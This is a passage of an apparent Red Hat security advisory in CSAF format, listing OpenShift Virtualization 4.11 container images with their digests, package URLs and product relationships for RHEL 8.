"container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.11.0-17", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product: { name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product_id: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product_id: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product_id: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product_id: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.11.0-16", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product_id: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product_id: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product_identification_helper: { purl: "pkg:oci/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup&tag=v4.11.0-67", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", }, product_reference: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", }, product_reference: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64 as a component of CNV 4.11 for RHEL 8", product_id: 